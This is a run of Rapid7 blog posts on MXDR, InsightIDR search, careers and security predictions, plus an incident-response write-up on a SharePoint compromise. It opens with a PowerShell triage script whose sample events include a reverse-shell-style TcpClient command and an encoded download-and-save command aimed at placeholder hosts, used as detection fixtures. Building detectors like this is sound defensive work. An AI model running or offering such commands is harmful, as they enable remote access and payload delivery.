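        "decoded_script": decoded,
        "java_parent": parent.endswith(("java.exe", "javaw.exe")),
    }


def triage(events: list) -> list:
    """Return the triage record of every event that fired at least one rule."""
    return [r for r in (triage_event(e) for e in events) if r["hits"]]


# Constructed sample events (hypothetical hosts, IPs and scripts).
SCRIPT_3 = "Invoke-WebRequest -Uri http://example.invalid/p.ps1 -OutFile $env:TEMP\\p.ps1"

SAMPLE_EVENTS = [
    {"id": 1, "image": "powershell.exe", "parent_image": "explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "image": "powershell.exe", "parent_image": "javaw.exe",
     "cmdline": ("powershell.exe -noni -ep bypass -nop -c \"$c=New-Object "
                 "System.Net.Sockets.TcpClient('203.0.113.10',443);"
                 "$k=[byte[]](1..16);$o=$d|%{$_ -bxor $k[$i++ % 16]}\"")},
    {"id": 3, "image": "powershell.exe", "parent_image": "javaw.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {encode_powershell(SCRIPT_3)}"},
]

if __name__ == "__main__":
    for record in triage(SAMPLE_EVENTS):
        print(record["id"], record["hits"], "java parent:", record["java_parent"])
        if record["decoded_script"]:
            print("  decoded:", record["decoded_script"])
```

Run it directly to print the flagged events. Treat the hits as triage input rather than verdicts: the flag combination alone also appears in legitimate automation, which is why the parent process and the decoded payload are what make a Cleo-hosted instance worth escalating.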

Expanded SOC Coverage Into AWS Environments with Rapid7 MXDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/12/03/expanded-soc-coverage-into-aws-environments-with-rapid7-mxdr/

Co-authored by Mikayla Wyman and Ryan Blanchard

As organizations increasingly rely on AWS for scalability and innovation, the complexity of securing these environments grows. AWS offers a robust set of native services and a comprehensive ecosystem, but managing security signals and responding to threats across dynamic workloads can overwhelm even the most well-equipped teams.

Rapid7’s Managed Extended Detection and Response (MXDR) service has focused on helping customers bridge this gap, unifying security telemetry from major cloud service providers including AWS and Azure, with expert-driven detection and response. With MXDR, organizations can confidently scale their cloud investments without sacrificing the comprehensive coverage they’re familiar with today.

Tailored to AWS Workloads and Modern Cloud Security Challenges

MXDR delivers the context and coverage needed to handle complex threats in AWS environments, providing a purpose-built service to address the specific challenges of securing modern cloud environments. With the extension of MXDR for AWS, teams can tailor their Rapid7 MXDR support to include triage, investigation, and response for critical GuardDuty alerts directly within their MDR service.

Layering native AWS telemetry with insights from other tools and environments creates a centralized, unified view of your security posture. With this context, our team is able to tailor protections and actions to the unique needs of your environment, safeguarding your assets more effectively against evolving threats. This comprehensive perspective empowers Rapid7 MDR analysts to operate at peak efficiency, ensuring your organization experiences a robust incident response lifecycle, from initial detection and alert triage to containment and response.

Augmenting Your Security Team with a Fleet of CDR Experts

Protecting your AWS environment doesn’t need to be a solo effort. With Rapid7 MXDR, you gain access to our extensive team of seasoned MDR analysts who diligently monitor, triage, and respond to incidents in real time, reducing operational burden. With an expert MDR team on call, teams are ready to contain incidents and limit blast radius. Customized mitigation and response strategies for AWS workloads, aligned with your unique environment and risk tolerance, enable our team to provide clear insights, remediation guidance and future mitigation recommendations that improve security and drive executive buy-in for security investments.

By deeply integrating cloud risk context from our industry-leading CNAPP capabilities into the incident response workflow, our MDR analysts are equipped with environmental awareness needed to act more quickly on your behalf to stop attackers in their tracks.

Rapid7 MXDR eliminates the need for piecemeal tools and processes by delivering end-to-end security services that combine AWS-native telemetry with cross-platform intelligence. The result is comprehensive threat detection and mitigation across your AWS environments without the complexity of managing multiple tools, providing:

  • Cloud Attack Surface Visibility and Advanced Threat Detection: Correlating AWS telemetry with global threat intelligence to build a dynamic map of your environment, uncover sophisticated attacks and spot avenues for lateral movement.
  • Continuous Coverage and Proactive Threat Hunting: Lean on our team of seasoned SOC experts who monitor, triage, and respond to incidents in real time, reducing operational burden.
  • Visibility into Cloud Identities, Their Permissions and Privileges: Monitor all cloud accounts and identities and proactively spot anomalous and potentially malicious user behavior, privilege escalations, or unusual API calls.
  • AI-Assisted Triage with Risk-Aware Context: Automatic context enrichment for cloud alerts with the relevant information SOC analysts need to understand the posture of a compromised account or resource and prioritize response.

Take Command of Your AWS Security Today

Whether you’re protecting critical workloads or responding to active threats, Rapid7 MXDR enables organizations to secure their AWS environments with confidence. From continuous monitoring to expert response, Rapid7 ensures your AWS assets remain protected while allowing your team to focus on driving business innovation.

Contact Rapid7 today to see how MXDR can elevate your AWS security posture.

Rapid7 Recognized for ‘Excellence in Workplace Health and Wellbeing’ at the Belfast Telegraph IT Awards

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/19/rapid7-recognized-for-excellence-in-workplace-health-and-wellbeing-at-the-belfast-telegraph-it-awards/

On Friday, November 15th, Rapid7 was awarded ‘Excellence in Workplace Health and Wellbeing’ at the Belfast Telegraph IT Awards. This award recognizes technology companies in Belfast that prioritize employee well-being.

At Rapid7, we believe that the best ideas and solutions come from diverse, multi-faceted teams. By supporting our people with programs that enhance their well-being and quality of life, we create an environment where they can continue to have rewarding career experiences and make an incredible impact on our business. Our programs go beyond just taking care of people when they are sick. Instead, we look to increase their overall quality of life with unique initiatives and offerings that support both physical and mental health and wellness.

Our award submission was broken down into three key areas where we offer unique benefits that make us leaders in our field. These areas included benefit offerings, physical health and well-being, and mental health and well-being.

Benefit Offerings

Rapid7 is proud to offer unique and competitive benefits to employees and their families. One example is our neurodiversity coverage. Employees at Rapid7, and their family members, have access to specialists for evaluations, screenings, and treatment programs. Appointments and services that would otherwise take months or years are able to happen within weeks.

As part of our health benefit program, once a year, our company participates in a global health and well-being challenge. This is not your typical ‘steps’ challenge, but instead a comprehensive initiative encompassing physical activity, meditation, and mindfulness, designed to build connections across Rapid7 teams.

Physical health and well-being

Our cycle-to-work scheme allows employees to set aside a salary sacrifice to purchase a new bicycle. There is no maximum limit, so our employees are often able to select high-end models at an affordable rate. Employees drop in and out of the program as they wish, and this year 16 employees are saving up for their new bikes.

For those who prefer a gym or fitness classes, our Chichester Street office building is equipped with a full-service gym featuring cardio and weight training equipment, as well as a yoga and group fitness studio. The fitness studio offers a variety of virtual programs on demand, many of which can be completed in just 20 minutes, making it easy for employees to fit in a quick break during their day.

Mental health and wellbeing

AwareNI is a local organization that we’ve been proud to partner with. We participate in their Mood Matters program, bringing mental health awareness and training to employees across Rapid7. What is most distinctive, however, is our on-site mental health first aiders: we partner with AwareNI to train employees as mental health first aiders, giving colleagues a resource in the office to turn to if they are experiencing a mental health crisis. These first aiders are equipped with the skills and knowledge to guide and support colleagues through a mental health-related crisis.

At Rapid7, we are on a mission to create a secure digital world for our customers, our industry, and our communities. We show up every day to keep our 11,000+ customers around the world protected from the latest threats. This requires us to build a dynamic workplace where innovation and collaboration thrive. Taking care of our people is a critical first step, and we’re honored to have been recognized as a leader in this space. To learn more, please visit our careers site at careers.rapid7.com.

New IDR Log Search Enhancements: Accelerate, Streamline, and Simplify Investigations

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/15/new-idr-log-search-enhancements-accelerate-streamline-and-simplify-investigations/

Co-authored by Ed Montgomery & René Fusco, Rapid7

In today’s cybersecurity landscape, organizations need robust detection and response solutions to stay ahead of evolving threats. Rapid7’s InsightIDR, the foundation of our Managed Detection and Response (MDR) service, empowers security teams with advanced analytics, automation, and expert-led investigations. Whether used as a standalone SIEM and XDR platform or in combination with MDR, InsightIDR’s latest Log Search enhancements bring even more value across the board. These updates accelerate response times, simplify complex queries, and improve the investigation process for both our MDR clients and product-only customers.

These updates, including Simplified Query Building, Pre-Computed Queries, and Bloom Filters, enhance the speed, accuracy, and accessibility of log search for security teams, ensuring faster, more targeted threat investigations for organizations.

Let’s explore how these updates elevate the detection and response lifecycle.

Simplified Query Building: Empowering Analysts to Act Faster

A key element of any detection and response solution is the ability to quickly turn data into actionable insights. Simplified Query Building enables analysts to construct and refine log searches faster, without complex syntax or technical details. This user-friendly interface enables any InsightIDR user, regardless of technical expertise, to create advanced queries through point-and-click prompts, accessing critical data quickly to streamline investigations.

By lowering the barrier to creating queries, Simplified Query Building provides organizations with timely, data-backed insights into incidents, reducing investigation time for both Rapid7’s MDR team and InsightIDR customers. This update ensures that every security team member, regardless of tenure, can access and leverage the power of InsightIDR’s log data without becoming bogged down by technical complexities.

[Figure: InsightIDR – Simplified Query Building]

Pre-Computed Queries: Reducing Time-to-Response for All Investigations

Time is critical when it comes to threat response. With Pre-Computed Queries (PCQs), both MDR and product-only customers benefit from reduced log search times. PCQs enable predictably fast, near-instant access to insights by pre-calculating query results in real time as data arrives, enhancing responsiveness for all InsightIDR users.

Customer Feedback

“As an MSSP, InsightIDR’s ability to handle large amounts of data is key for identifying threats in our client environments. Pre-Computed Queries have reduced return times for complex searches by over 70%, allowing us to create more impactful insights for our clients.”

— Mat Cornish, Technical Director, Longwall Security

While InsightIDR already supports saving queries for reuse, PCQs take it further by pre-computing results, helping analysts to instantly identify patterns or gather evidence. Additionally, the Log Search home tab organizes queries by “Recent,” “Saved,” and “Pre-computed,” enabling users to quickly find what they need for streamlined incident handling. Whether you’re a customer conducting an in-house investigation or part of Rapid7’s MDR team, PCQs ensure faster insights and more efficient incident response.

[Figure: InsightIDR – Pre-Computed Queries]

Bloom Filters: Accelerating Key Value Pair Searches for Precise Threat Hunts

Not all queries can be pre-calculated in advance. Security teams are frequently asked questions about potential exposure to specific indicators of compromise (IoCs), such as flagged IP addresses or hash values. With Bloom Filters, both MDR and product-only customers gain a performance boost in search time for precise threat hunts by reducing unnecessary data processing.

For exact match searches, such as identifying a compromised IP address or hunting for a suspicious hash value with a query like where(hash.sha="…"), Bloom Filters optimize search time by ruling out irrelevant data, enabling the engine to skip logs that cannot contain a match. A Bloom filter can answer "maybe" for data that turns out not to match (a false positive, which only costs a scan), but it never answers "no" for data that does match, so results stay complete. This enhancement is implemented on the backend and occurs automatically for any search that contains an exact match key-value pair. Reducing the search space lets analysts home in on the exact information they need, cutting investigation time dramatically.

A recent research effort into InsightIDR’s new indexing approach, which leverages Bloom Filters, showed impressive results with:

  • Improved Efficiency: Approximately 40-60% of all searches have experienced noticeable speed improvements since deployment.
  • Increased Precision: The new index has enabled applicable queries to skip irrelevant data three to four times more effectively, leading to shorter search durations for even more efficient investigations.
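To make the skip-ahead concrete, here is an added example, written for this page and not InsightIDR’s implementation, of a chunked log index with a per-chunk Bloom filter over every flattened key=value pair, queried with the where(key="value") form used above. The log schema, chunk size, filter sizing and the sample events are assumptions.

```python
"""Added example (not InsightIDR's code): a chunked log store where each chunk
carries a Bloom filter over its key=value pairs, so an exact-match search can
skip chunks that cannot contain a hit. Schema and events are constructed."""
import hashlib
import json
import math
import re
from typing import Iterator


class BloomFilter:
    """Classic Bloom filter sized for n items at a target false-positive rate."""

    def __init__(self, expected_items: int, fp_rate: float = 0.01) -> None:
        n = max(1, expected_items)
        self.m = math.ceil(-n * math.log(fp_rate) / (math.log(2) ** 2))  # bits
        self.k = max(1, round(self.m / n * math.log(2)))                 # hashes
        self.bits = bytearray((self.m + 7) // 8)

    def _positions(self, item: str) -> Iterator[int]:
        # Double hashing: derive k positions from two halves of one SHA-256.
        digest = hashlib.sha256(item.encode("utf-8")).digest()
        h1 = int.from_bytes(digest[:8], "little")
        h2 = int.from_bytes(digest[8:16], "little") | 1  # odd stride
        for i in range(self.k):
            yield (h1 + i * h2) % self.m

    def add(self, item: str) -> None:
        for pos in self._positions(item):
            self.bits[pos >> 3] |= 1 << (pos & 7)

    def might_contain(self, item: str) -> bool:
        """False is definitive ('not here'); True means 'scan to be sure'."""
        return all(self.bits[pos >> 3] & (1 << (pos & 7)) for pos in self._positions(item))


def flatten(event: dict, prefix: str = "") -> Iterator[tuple]:
    """Yield (dotted.key, value) pairs, so {"hash": {"sha": x}} gives ("hash.sha", x)."""
    for key, value in event.items():
        path = f"{prefix}{key}"
        if isinstance(value, dict):
            yield from flatten(value, path + ".")
        else:
            yield path, str(value)


class ChunkedLogIndex:
    """Fixed-size chunks of events, each with a filter over its key=value tokens."""

    def __init__(self, events: list, chunk_size: int = 3, fp_rate: float = 0.001) -> None:
        self.chunks = []
        for start in range(0, len(events), chunk_size):
            chunk = events[start:start + chunk_size]
            tokens = {f"{k}={v}" for ev in chunk for k, v in flatten(ev)}
            bf = BloomFilter(len(tokens), fp_rate)
            for token in tokens:
                bf.add(token)
            self.chunks.append((bf, chunk))

    def search(self, query: str) -> tuple:
        """Run an exact-match query of the form where(key="value"); return (hits, stats)."""
        m = re.fullmatch(r'\s*where\(\s*([\w.]+)\s*=\s*"([^"]*)"\s*\)\s*', query)
        if not m:
            raise ValueError(f"unsupported query: {query!r}")
        key, value = m.groups()
        needle = f"{key}={value}"
        hits, stats = [], {"chunks_scanned": 0, "chunks_skipped": 0}
        for bf, chunk in self.chunks:
            if not bf.might_contain(needle):
                stats["chunks_skipped"] += 1   # the filter rules this chunk out
                continue
            stats["chunks_scanned"] += 1       # maybe present: scan the chunk
            hits.extend(ev for ev in chunk
                        if any(f"{k}={v}" == needle for k, v in flatten(ev)))
        return hits, stats


# Constructed sample events: hypothetical hosts, documentation-range IPs, fake hashes.
SAMPLE_LOGS = [json.loads(line) for line in """
{"host": "web-01", "process": "nginx", "hash": {"sha": "0f1e2d3c4b5a6978"}, "src_ip": "198.51.100.7"}
{"host": "web-01", "process": "curl", "hash": {"sha": "deadbeef0badcafe"}, "src_ip": "198.51.100.7"}
{"host": "web-02", "process": "nginx", "hash": {"sha": "0f1e2d3c4b5a6978"}, "src_ip": "198.51.100.9"}
{"host": "db-01", "process": "postgres", "hash": {"sha": "77aa88bb99cc00dd"}, "src_ip": "10.0.0.5"}
{"host": "db-01", "process": "sshd", "hash": {"sha": "11223344556677ff"}, "src_ip": "10.0.0.8"}
{"host": "app-03", "process": "java", "hash": {"sha": "a0b1c2d3e4f50617"}, "src_ip": "10.0.1.2"}
{"host": "app-03", "process": "powershell", "hash": {"sha": "c0ffee00c0ffee00"}, "src_ip": "10.0.1.2"}
{"host": "db-02", "process": "curl", "hash": {"sha": "deadbeef0badcafe"}, "src_ip": "10.0.0.9"}
{"host": "web-02", "process": "nginx", "hash": {"sha": "0f1e2d3c4b5a6978"}, "src_ip": "198.51.100.3"}
{"host": "app-01", "process": "java", "hash": {"sha": "a0b1c2d3e4f50617"}, "src_ip": "10.0.1.7"}
""".strip().splitlines()]

if __name__ == "__main__":
    index = ChunkedLogIndex(SAMPLE_LOGS)
    for q in ('where(hash.sha="deadbeef0badcafe")', 'where(src_ip="203.0.113.99")'):
        hits, stats = index.search(q)
        print(q, "->", len(hits), "hit(s)", stats)
```

Each chunk’s filter answers "could this key=value pair be in here?"; a "no" is definitive and the chunk is skipped, while a "yes" may be a false positive (tunable through fp_rate) that costs only one scan. Because the index holds nothing but exact key=value tokens, it helps exact-match searches and does nothing for substring or regex queries, which matches the "exact match key-value pair" condition described above.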

Bringing It All Together: Faster, More Effective Detection and Response

Whether you’re a Rapid7 MDR customer or an InsightIDR product-only user, these Log Search updates significantly enhance detection and response capabilities. By reducing search times, simplifying complex queries, and pinpointing threats with greater accuracy, we provide every InsightIDR user with faster, more effective security outcomes.

This means:

  • Faster Detection: Pre-Computed Queries and Bloom Filters accelerate search processes, enabling quicker response to incidents across both MDR and product-only use cases.
  • Improved Visibility: Simplified Query Building ensures analysts can quickly refine searches and access the data needed for comprehensive investigations.
  • Targeted Threat Hunts: Optimized key-value pair searches focus on the most relevant data, delivering quicker results for security teams.

Want to see these improvements in action? Contact us today to learn how Rapid7’s MDR service can protect your organization. You can also try InsightIDR for free with a 30-day trial.

Cathal O’Neill – Taking Command of Your Career in Tech

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/07/cathal-oneill-taking-command-of-your-career-in-tech/

Cathal O’Neill joined Rapid7 in 2023 as a Senior Engineering Manager, and he has since advanced to the role of Engineering Director. Reflecting on his career path, he says, “My journey into senior management has been a continual evolution, driven by both personal development and the desire to lead challenging technical projects.”

Cathal credits those experiences with paving a path of continuous growth and development. Beginning his career as an intern and moving through roles from engineer to team leader, he notes, “Through each role, I’ve gained deeper insights into the technical, managerial, and strategic aspects of technology leadership. As I navigated these roles, only then did I understand the scale at which software solutions need to operate and evolve.”

We asked what his key to success was, and he shared what he sees as three critical ingredients for taking command of your career in tech:

  • Feedback
  • Connections
  • Continuous Learning

Below, Cathal delves into each principle and offers resources and practical tips that have helped him along the way.

Feedback

“I often hear that feedback is a gift. This is something I know to be true today, but it took me a while to realise what this really meant, and get comfortable with it. Early in my career, I would get constructive feedback and feel defensive or try to prove that it wasn’t true. Once I started to embrace feedback and use it as an opportunity to learn, I was able to navigate challenges much more efficiently, and become a better leader for my team. Looking back, every major milestone in my career was shaped by feedback from teammates, managers and mentors.”

“Feedback is most effective when built on mutual trust. Early on, a mentor recommended Radical Candor, a book by Kim Scott that emphasises the importance of relationships in delivering constructive feedback. I’ve applied its principles to give and receive feedback in ways that feel authentic and lead to productive outcomes. The Software Engineering Guidebook by Gergely Orosz is another one that I have recently been reading, and using to frame my feedback and guidance to my teams. Orosz dives into both the technical aspects of the software roles, as well as providing advice on how to work within an organisation.”

Connections

“As I navigate different situations, I’ve found myself very lucky to have a number of strong people around me who lean in to help me succeed. Whether it’s offering advice, critical or positive feedback, or “rubber ducking” with me (which I’ve found not just to be useful when debugging code!), these connections continue to shape my development today.

When building your network, I recommend:

  • Being intentional: Aim to build relationships with people whose experiences and career paths you value, as opposed to trying to grow your network for the sake of it.
  • Engaging thoughtfully: Do the groundwork to understand someone’s background and ask specific, meaningful questions. Genuine curiosity often forms the foundation of strong professional relationships.
  • Following up: Maintaining relationships requires effort. A quick message to check in, a note on how their advice helped, or a casual coffee catch-up can strengthen these connections over time.”

Continuous Learning

“Learning happens in many forms—through formal programs or hands-on experiences—and is something we feel very passionately about at Rapid7, as it relates to our core value of ‘Never Done.’ Shortly after joining, I participated in the Manager Bootcamp, which laid the foundation for understanding Rapid7’s leadership expectations. Later, I joined the Amplify program, which provides 360-degree reviews and insights from senior leaders, including our CEO, Corey Thomas. As I went through the Amplify programme, I read ‘Scaling People: Tactics for Management and Company Building’ by Claire Hughes Johnson. This book helped reinforce concepts I was learning and is one that I would recommend to anyone in a leadership role.

Outside of these formal programmes, learning is embedded into our everyday culture and how we operate as a global company. In the Cloud Security engineering teams, we have lunch and learn sessions, show and tells, and have recently launched cloud technology and cloud security training, which cover the various cloud providers and industry certifications. At Rapid7, we are open to giving people stretch assignments or leaning in on new projects that relate to an area or topic they are interested in and want to learn more about. If you want to do something different or specialise in another area of the business, you don’t need to leave the company to find those opportunities. Having learning be tied to our culture enables internal mobility and growth in a way that is really unique.”

Recommended:

“These books have enriched my understanding of tech leadership, offering new perspectives on challenges I’ve faced and reinforcing essential concepts. While on the job training provides a tremendous opportunity to grow, seeking out additional content is also part of continuous learning. Some of these books cover content that I “know already” but help frame it differently or serve as a reminder of the foundations as my role has evolved. Revisiting these resources periodically helps me stay grounded as I navigate day-to-day challenges, and I’m always on the lookout for new resources to learn from.”

Conclusion: Cultivating Growth at Rapid7

As he reflects on his path, Cathal emphasises how Rapid7 fosters a culture of growth, allowing employees to take active ownership of their career trajectories.

“Before joining Rapid7, I heard a lot about the company’s culture. After nearly three years, I can say it truly sets Rapid7 apart. People here focus not just on their own success but on the success of their colleagues and the collective. This environment fosters trust, encourages open feedback, and provides unique learning experiences—all of which make Rapid7 a place where careers can thrive.”

For those interested in joining the Rapid7 team, you can explore opportunities on our careers page or view all open roles here.

20/20 Cybersecurity: Lessons Learned in 2024 and Strategies for a Stronger 2025

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/11/04/20-20-cybersecurity-lessons-learned-in-2024-and-strategies-for-a-stronger-2025/

With 2024 rapidly coming to a close, many of us here at Rapid7 are taking a step back, reflecting upon the successes and learnings of the last 12 months, and looking ahead to the challenges and opportunities we could jointly face in the year ahead. Of course, we are doing the same for our customers.

For cybersecurity practitioners, 2024 has been nothing short of a rollercoaster ride. As organizations continue to embrace digital transformation at an accelerated pace, the security landscape has shifted, forcing security teams to confront new threats on top of the old and adjust their strategies in real-time.

This year, more than any other, it feels like we’ve witnessed the perfect storm that will forever reshape our industry. Supply chain incidents, sophisticated ransomware attacks, and a global IT outage disrupted critical infrastructure and affected organizations across all sectors and geographies. That’s on top of the backdrop of some of the biggest public data breaches we’ve ever seen. It’s a stark reminder of the ongoing vulnerability of sensitive data and the escalating cost of breaches.

Beyond these headline-grabbing incidents, cybersecurity teams have contended with a growing attack surface driven by the proliferation of IoT devices, an uptick in cloud adoption, and the increasing interconnectivity of systems. Threat actors have capitalized on this complexity, launching more sophisticated, multi-stage attacks that challenge even the most mature security operations centers (SOCs). The sheer volume and diversity of attacks have made it clear: This is not a game of adding more tools to the stack but of refining strategies, fortifying defenses, and focusing on cybersecurity fundamentals.

The Year of Operational Strain and Strategic Reassessment

As cyber threats grew more pervasive and intricate, the demands on security teams reached a breaking point. The year was marked by operational strain, with SecOps teams pushed to their limits to defend against an onslaught of increasingly complex threats. For many organizations, resource constraints — both in terms of personnel and budgets — further compounded the issue, leading to a reactive stance rather than a proactive one. This environment has necessitated a strategic reassessment of how we approach security.

The reality is stark: In 2024, many security professionals found themselves spending more time chasing alerts and parsing through logs than addressing core security challenges. This operational burden has impacted efficiency, morale, and ultimately, the effectiveness of security measures.

Yet, amidst these challenges lies a critical insight. Empowering teams with the right knowledge, tools, and support can dramatically transform outcomes. Security leaders must take command, refocusing on strategies that foster collaboration and transparency while building resilience against a dynamic threat landscape.

Empowering Teams: A New Approach for 2025

Heading into 2025, the need for a shift in approach has never been clearer. This is not merely about layering more technology into an already complex environment. It’s about establishing a partnership that empowers teams to confidently anticipate, pinpoint, and act against threats with precision and clarity. When security professionals are equipped with the right data and expertise, they can reduce the noise, eliminate inefficiencies, and spend more time addressing the strategic priorities that truly matter to their organizations.

Central to this strategy is fostering a culture of trust and collaboration between security teams and other business units. By breaking down silos and establishing shared goals, security leaders can ensure that everyone — from technical stakeholders to the C-Suite — is aligned on what success looks like and how it will be measured. This unified approach, underpinned by reliable data and transparent communication, is key to mitigating risk and optimizing security operations.

Join Us for the 2025 Security Predictions Webinar

To help the security community navigate these evolving challenges and prepare for what’s ahead, Rapid7 is once again hosting its annual 2025 Security Predictions webinar. Featuring our Chief Scientist, Raj Samani, and Vice President of Global Government Affairs and Public Policy, Sabeen Malik, this webinar will explore some of the most pressing issues facing the security community and provide valuable insights into how organizations can better position themselves for the future.

Reflecting on past discussions, we’ve tackled critical themes like talent shortages, public versus private information sharing, and the operationalization of security.

Plan for 2025 with Confidence

Our retrospective on 2024 might feel laden with challenges, yet there is an undeniable silver lining: A unified cybersecurity strategy is within reach. By breaking down organizational silos, fostering a shared vision, and empowering security teams to act with precision and clarity, organizations can take command of their security posture.

At Rapid7, we believe that clarity is power. As we look toward 2025, our mission is to provide that clarity and support, enabling organizations to anticipate, pinpoint, and act on threats with confidence. The lessons of 2024 have taught us that resilience and adaptability are paramount. Now is the time to capitalize on these learnings and put them into practice.

Register Now

Register today and save your seat. Let’s make 2025 the year we take command of the attack surface, reduce operational risk, and set the standard for proactive, efficient, and effective cybersecurity.

Investigating a SharePoint Compromise: IR Tales from the Field

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/

Executive summary


Rapid7’s Incident Response team recently investigated suspicious activity tied to a Microsoft Exchange service account that held domain administrator privileges. The investigation uncovered an attacker who had accessed a server without authorization and moved laterally across the network, compromising the entire domain, and who remained undetected for two weeks. Rapid7 determined the initial access vector to be exploitation of a vulnerability, CVE-2024-38094, in the organization’s on-premises SharePoint server.

Exploitation for initial access has been a common theme in 2024, often requiring security tooling and efficient response procedures to avoid major impact. The attacker’s tactics, techniques, and procedures (TTPs) are showcased in this blog, along with some twists and turns we encountered when handling the investigation.

Observed attacker behavior

Rapid7 began by examining suspicious process executions tied to a Microsoft Exchange service account. The service account had installed Huorong Antivirus (AV), software that was not authorized in the environment. For context, Huorong Antivirus is a popular AV product in China that can be installed from the Microsoft Store. Most notably, the Huorong installation conflicted with the security products already active on the system and caused their services to crash. Stopping the system’s existing security solutions gave the attacker freedom to pursue follow-on objectives, which maps this activity to Impair Defenses (T1562).

Zooming out from this single event to the surrounding activity paints a clear picture of the attacker’s goal. Shortly before installing Huorong AV, the attacker used Python to install Impacket from GitHub and then attempted to execute it. Impacket is a collection of open-source Python scripts for interacting with network protocols, typically used to facilitate lateral movement and other post-exploitation objectives. The system’s security tooling blocked the Impacket execution, and it was this block that led the attacker to download the AV product via a browser and install it to circumvent defenses.

As in many incident response investigations, the clues are not discovered in chronological order, so a timeline must be constructed to understand the narrative and to work out how the attacker first compromised a system or gained access to the environment. In this investigation, the attacker had a dwell time of two weeks. The attacker’s actions are laid out chronologically in the figure below.

Figure 1: MITRE Timeline

One of the best resources for identifying lateral movement is the authentication event log on the domain controllers, specifically event ID 4624 (successful logon). Evidence showed that the malicious activity involving this compromised Exchange service account was not confined to the single system where it was first noticed: the unauthorized activity traced back a week earlier to a domain controller.

Analysis of the domain controller revealed that the attacker used this Exchange service account to authenticate via Remote Desktop Protocol (RDP). The attacker went on to disable Windows Defender Threat Detection (WDTD) on the system and, using the GUI, added an exclusion for a malicious binary called msvrp.exe. The binary was placed in the C:\ProgramData\VMware\ folder but was not related to VMware. It is a tool called Fast Reverse Proxy (FRP), which allows external access to the system through a NAT-configured firewall. FRP requires an .ini file holding the network configuration for its outbound connection; the external IP address from that .ini file is listed in the Indicators of Compromise (IoCs) table in this blog post. Persistence for FRP was established via scheduled tasks on the domain controller. Review of the C:\ProgramData\VMware\ folder used by the attacker revealed additional malicious binaries, including ADExplorer64.exe, NTDSUtil.exe, and nxc.exe, which were used to map the Active Directory environment, gather credentials, and scan systems.

Further analysis of the domain controller’s authentication events showed that this malicious activity originated from a public-facing SharePoint server. Evidence indicated that the attacker executed Mimikatz on the SharePoint server and that its logs had been tampered with: most system logging was disabled, and several key event log sources were absent for the investigation time frame. Mimikatz can clear event logs and disable system logging. These executions were tied to the system’s local administrator account, which would provide the privileges needed for log tampering. Some logs were spared, however, including RDP log evidence, which showed that every authentication for the local administrator account during the in-scope time frame was sourced from the local system to itself. This pointed to the SharePoint server as the likely initial access vector (IAV), so Rapid7 dug deeper into possible exploitation of the SharePoint services.
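The 4624-based pivot described above can be worked through in code. The following is an added example written for this post, not tooling from the Rapid7 investigation: it takes constructed 4624 records (account, logon type, source workstation and address), flags console or RDP logons by accounts that should only ever run as services, and walks the earliest remote logon on each host backwards to reconstruct the hop chain. The host names, the account name svc_exchange and the addresses are all invented for the example.

```python
"""Reconstruct a lateral-movement chain from Windows event ID 4624 records.

Added example for this post; the records below are constructed, not data from
the Rapid7 investigation. Field names mirror the 4624 EventData fields
TargetUserName, LogonType, WorkstationName and IpAddress.
"""
from datetime import datetime

INTERACTIVE = 2          # console logon
NETWORK = 3              # SMB, WinRM, etc.
REMOTE_INTERACTIVE = 10  # RDP
LOCAL_SOURCES = {"127.0.0.1", "::1", "-", ""}

# Accounts that should never log on interactively (constructed name).
SERVICE_ACCOUNTS = {"svc_exchange"}

# Constructed 4624 records: host = computer that recorded the event,
# workstation/ip = where the logon came from.
SAMPLE_EVENTS = [
    {"time": "2024-09-01T02:10:00", "host": "SP01",   "user": "administrator", "logon_type": 2,  "workstation": "SP01",      "ip": "127.0.0.1"},
    {"time": "2024-09-03T03:15:00", "host": "DC01",   "user": "svc_exchange",  "logon_type": 10, "workstation": "SP01",      "ip": "10.0.5.20"},
    {"time": "2024-09-03T03:16:00", "host": "DC01",   "user": "svc_exchange",  "logon_type": 3,  "workstation": "SP01",      "ip": "10.0.5.20"},
    {"time": "2024-09-10T04:00:00", "host": "EXCH01", "user": "svc_exchange",  "logon_type": 10, "workstation": "DC01",      "ip": "10.0.1.10"},
    {"time": "2024-09-10T09:00:00", "host": "EXCH01", "user": "svc_exchange",  "logon_type": 5,  "workstation": "-",         "ip": "-"},
    {"time": "2024-09-10T09:30:00", "host": "FS01",   "user": "jsmith",        "logon_type": 10, "workstation": "WS-JSMITH", "ip": "10.0.9.5"},
]


def parse_time(value):
    return datetime.fromisoformat(value)


def suspicious_service_logons(events, service_accounts=SERVICE_ACCOUNTS):
    """Service accounts logging on at a console or over RDP: worth alerting on,
    because a service account has no business doing either."""
    return [
        e for e in events
        if e["user"].lower() in service_accounts
        and e["logon_type"] in (INTERACTIVE, REMOTE_INTERACTIVE)
    ]


def remote_logons_to(events, host, user):
    """4624 events on `host` for `user` whose source is another machine, oldest first."""
    hits = [
        e for e in events
        if e["host"] == host
        and e["user"].lower() == user.lower()
        and e["ip"] not in LOCAL_SOURCES
        and e["workstation"] != host
    ]
    return sorted(hits, key=lambda e: parse_time(e["time"]))


def only_local_logons(events, host, user):
    """True when every logon of `user` on `host` came from the host itself,
    the pattern described above for the SharePoint local administrator."""
    mine = [e for e in events if e["host"] == host and e["user"].lower() == user.lower()]
    return bool(mine) and all(
        e["ip"] in LOCAL_SOURCES or e["workstation"] == host for e in mine
    )


def trace_chain(events, start_host, user, max_hops=10):
    """Walk backwards from the host where activity was first noticed: on each hop
    take the earliest remote logon of `user` and jump to its source workstation.
    Stops when a host shows no remote logon for that account (or on a cycle)."""
    chain = [start_host]
    visited = {start_host}
    current = start_host
    for _ in range(max_hops):
        hits = remote_logons_to(events, current, user)
        if not hits:
            break
        source = hits[0]["workstation"]
        if source in visited:
            break
        chain.append(source)
        visited.add(source)
        current = source
    return chain


if __name__ == "__main__":
    for e in suspicious_service_logons(SAMPLE_EVENTS):
        print("ALERT service account interactive logon:", e)
    chain = trace_chain(SAMPLE_EVENTS, "EXCH01", "svc_exchange")
    print("hop chain (newest -> oldest):", " <- ".join(chain))
    origin = chain[-1]
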